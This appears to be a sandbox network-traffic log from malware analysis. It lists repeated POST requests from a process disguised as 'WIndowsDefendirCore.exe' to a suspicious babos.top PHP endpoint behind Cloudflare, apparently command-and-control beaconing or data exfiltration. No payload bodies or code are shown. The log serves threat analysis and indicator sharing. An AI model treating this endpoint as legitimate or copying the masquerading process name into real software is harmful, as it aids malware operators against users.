Date: Sat, 01 Feb 2025 18:21:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AsAz0bg8vImyFsT8IIX2zQHIO3%2FXq0fWTMWmF2El%2FOOyKBobz17ZpBuT7KWl%2BHmB%2BLieHEnGN5OHviIVAnke3fQW4jy9ni%2B6n3ybi3xzM4GIKLL7d%2FOcqEvqghc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5b5ee3cf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=43557&min_rtt=26821&rtt_var=20032&sent=27&recv=21&lost=0&retrans=2&sent_bytes=5175&recv_bytes=6271&delivery_rate=93238&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WSkErF8jDqWDtCBTYHEpVj0jfEdCldqhUyCg%2BkRlbkU28rHtHMcWg4tqViFcYavg05deaNbFXgyCCDEOMqjFo%2FbPVVykd5Gc01BWrGLrvYYNsDrlqeiZJJDdEUI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5c20da4f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=43339&min_rtt=26821&rtt_var=15460&sent=34&recv=25&lost=0&retrans=4&sent_bytes=7111&recv_bytes=7940&delivery_rate=93238&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xl00ZNyZmS2o1nxrDWyfkEGnwANsRx58OTcPIy63uaKc71GF3%2F9fTkw9VP%2F4eyfBZQAITgutDeyoanpAKs0JzZIj7PhmHyTQzYn0JpgzubFKC%2FnQDaMsGttArow%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5ca3fd4f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=44495&min_rtt=26283&rtt_var=19164&sent=38&recv=29&lost=0&retrans=4&sent_bytes=8081&recv_bytes=9609&delivery_rate=93238&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7N9eDSLVOPR0LMSkxpjImb2%2BNmlDgx7RnCPBJzldKD6%2B22lRbqU7MyPlgkD9aXIJnKVRUaUE1l%2B6VHYuEhfVqPQ30sCwGrcs8W%2FauwrF94tFumEMYxL7oxhgKXw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5d31f37f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=42271&min_rtt=26283&rtt_var=18821&sent=44&recv=34&lost=0&retrans=6&sent_bytes=10000&recv_bytes=11278&delivery_rate=93238&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJUXo8OEFTesNMbJ6t5H5UtfdbQyxUExfjd%2BeYPx3QhjOyDlY6sswiJN6zrxda70FwkpOukkiOriEqyq4NuEEMol3jJAS6vy02W6Hbdnya0LEivrvDcHUJKDU8g%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5db0b04f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=38591&min_rtt=26283&rtt_var=16957&sent=48&recv=38&lost=0&retrans=6&sent_bytes=10976&recv_bytes=12947&delivery_rate=102748&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1388
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3eFKeuP251MPspX5tyWwFRS1TKix7xwt0bbYIT2si%2FJji7eTUBeId2Q4SA2GIfug%2Fr3rHtlgZjPTTfODoSv0ZZZMOYr4sxMO%2FvNlNo0WyS4fhWVj20G5w5WkQds%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5e2aefcf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=35769&min_rtt=26283&rtt_var=14435&sent=52&recv=42&lost=0&retrans=6&sent_bytes=11947&recv_bytes=14600&delivery_rate=102748&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RTmNt0jwo1BJAwOtorqEwwx4eShtG9oG7m4OFj0RcfsVEHHlYT8BCXVWu3Y34OvDpj3GRGX7JUp9GlXS3xqxZdPgeu4UTfp8tsUuCqmwyrtujKI03EZinihIWY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5ea7b90f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=33711&min_rtt=26283&rtt_var=11650&sent=56&recv=46&lost=0&retrans=6&sent_bytes=12922&recv_bytes=16269&delivery_rate=102888&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z8TMPon9fyM9uHFuhK5uFGH6fp1i4IAujkmOojKQelBnyfTHZ9LcfinS%2FBCVJNl0q6dHYxUFTdenWEiZ%2FutmARmIjOwx2MC2mi7OTZqp5nSzXtSP2PVjVltRj1M%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5f22fe3f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=32191&min_rtt=26176&rtt_var=9124&sent=60&recv=50&lost=0&retrans=6&sent_bytes=13891&recv_bytes=17938&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vGNknzWF6KeteZwkHEGxPGIIqphRDCzBLINFXRpyKYodHG56pvKvxet2LIn0SnklHaN6tAcGmESIblWBlXMlXViFr1czXMApLGo7iibTdUI9zJJOYuy96H7407w%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f5f9cccbf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=33054&min_rtt=26176&rtt_var=8137&sent=64&recv=54&lost=0&retrans=6&sent_bytes=14863&recv_bytes=19607&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2F05uZ7giA3SojjxU8CWuGiLWCFNMm20R%2FZaCxUX4rudzMXDfvrhiqt065H%2BR3nyaFccCShyWGp5ioVkSNl%2B3Fx5ZEU8fpfuDQ0LdyYCbD800%2FVEJAdG3GzfpDU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f6017a83f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=34598&min_rtt=26176&rtt_var=9294&sent=68&recv=58&lost=0&retrans=6&sent_bytes=15831&recv_bytes=21276&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2ByUMxLcQMr3oxFOzFcOPGqJ1cqFfyhwAig22eLKEu9RfCPigG98IKXDL2qBuqVCERJ%2FJ0hE0U6nI32LKuZ7jtPt93XldYLLsFdbb28udgEnBw2YzPn7rDzdYHM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f6095ecff1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=33003&min_rtt=26176&rtt_var=7952&sent=72&recv=62&lost=0&retrans=6&sent_bytes=16809&recv_bytes=22945&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h06Et5%2B96mrbKsPq7Q3bZusbREii%2BLKEU%2FJyzSvM7ykO5Itu1vAkubZjn5GxFQlz6RFtyzzgmAC06%2FV6XrPptVyKxpSlcyZNfmZZ979RPZaLWgPY0fPaZaSMIZE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f610f9ccf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=32164&min_rtt=26176&rtt_var=6000&sent=76&recv=66&lost=0&retrans=6&sent_bytes=17781&recv_bytes=24614&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8UT%2FCSnCxF%2FuzyPb6%2BzPVzluYfH8y8iOwHjWfhMSbPrvjPOny41cBwJfVnzb91tlH1CxnBOSUaw2X4RqUNAEC%2Bw3bTEIJ5C9XUAcXHCyPi3zr7bdSf6zMU%2FrmFk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f6189d65f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=40966&min_rtt=26176&rtt_var=21885&sent=81&recv=70&lost=0&retrans=6&sent_bytes=18757&recv_bytes=26283&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cL8s%2F1njZ%2Fl53btN9qXPq%2BWiN6MFxCpq3eNMRmDN3xrvfLmdQn1j%2BPsCdRP3EULgoLv6HxNIpfmiWk%2FsEs3TCPQj%2FGXcUf5ZhhnoytqsHMeh4puQPvcV6qR5UoM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f622cd09f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=40271&min_rtt=26176&rtt_var=13645&sent=85&recv=74&lost=0&retrans=6&sent_bytes=19736&recv_bytes=27952&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FtENkAfloYXwRAn5wz%2BDW3O6tUsPvIRJ5OGvrT7VFf8C1R3%2BFux%2FhCwe0zeKyEPwgtaj5dxSMzeA9EuPDJvJ1ijqhDQqlAOfdx45vQNmPCSeO2JW%2BNpQjhgWzhc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f62b3b7af1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=39718&min_rtt=26176&rtt_var=11338&sent=91&recv=79&lost=0&retrans=8&sent_bytes=21673&recv_bytes=29621&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogpGSq%2B0SG7srdDtN17VdwH6yAeEeJNAiyVu6Ts2mS%2BGd1cxcUIpwB0nNhDryXg0S05qR4Jqew2F0kY5dp%2F1ivt0zZIkRZjeA2W%2F4f2bHxPLW%2FNqVf1TbzIPYmY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f6329db6f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=36706&min_rtt=26176&rtt_var=11218&sent=95&recv=83&lost=0&retrans=8&sent_bytes=22650&recv_bytes=31290&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vtlvRMQlUp9gqO6kSar0K2yYpHv7G7cYYEA%2FSr2OuE6OqopPxtZJ81MoPCNhYsVOBo8HBHvibtSfFWAYp4%2FWfjhexMoR8PnHzXoHcGI88ag%2FQcxfMKqAuZO6x%2BI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f63a2b1af1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=35630&min_rtt=26176&rtt_var=8197&sent=99&recv=87&lost=0&retrans=8&sent_bytes=23629&recv_bytes=32959&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1388
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rxeJVDkY%2BNPmxbdz0mrKes%2BsHE1%2BrZp%2F5JQCyxJPRn%2BrubUa5QENCkBQxTngMp6EgeoAN4JSkFLLC7eUjqFH9zM5JzPFnZ7Y7yicj%2BVIJUs%2BMvBaB%2BS0AS5XWFo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f6420829f1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=40753&min_rtt=26176&rtt_var=13285&sent=103&recv=91&lost=0&retrans=8&sent_bytes=24605&recv_bytes=34612&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1388
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DjNKBWS0n2%2BJNvqhsNslne2qRM8%2BDEPwYvmgEFFjs4%2FzDFR9m0K6vjI74P%2F6fDz6lss4dg27N8iC4pchPf%2FL1712fn9dLP%2F3WNYgMphboRi%2BjxuW8Ju6yYqoE8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f649dc6cf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=38588&min_rtt=26176&rtt_var=11185&sent=107&recv=95&lost=0&retrans=8&sent_bytes=25591&recv_bytes=36265&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eayKBdR0ooE2Vv9j5SACFOW%2Fhbdu9z6KV3%2FiorUpIpEI1EGUairgOOg5l19ZCZBkPIxf80%2Fq8Ctr6zYWkIH135AIdSfKqeod7mYbpg83TEyF844ImIFlDsuw3ZU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f65288eaf1a6-LHR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=38468&min_rtt=26176&rtt_var=8628&sent=115&recv=100&lost=0&retrans=12&sent_bytes=29442&recv_bytes=37934&delivery_rate=103544&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
POST

http://babos.top/imagecpuupdateprocessBigloadLinuxwplocal.php

WIndowsDefendirCore.exe

Remote address:

104.21.48.1:80

Request

POST /imagecpuupdateprocessBigloadLinuxwplocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: babos.top
Content-Length: 1404
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sat, 01 Feb 2025 18:21:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qhuz%2BUywT%2FQxFbFu%2FkwBy74QhZJdO%2FxckUD4YWJORCbG3El6Op5fqi%2F2HmCN77kj8Rp6yLVsO79RRyF4ThnLUyZklJ3tMYVKOeZ%2FWFjGA79h5uNoR5vGvqPh1pc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90b3f65a4d7af1a6-LHR
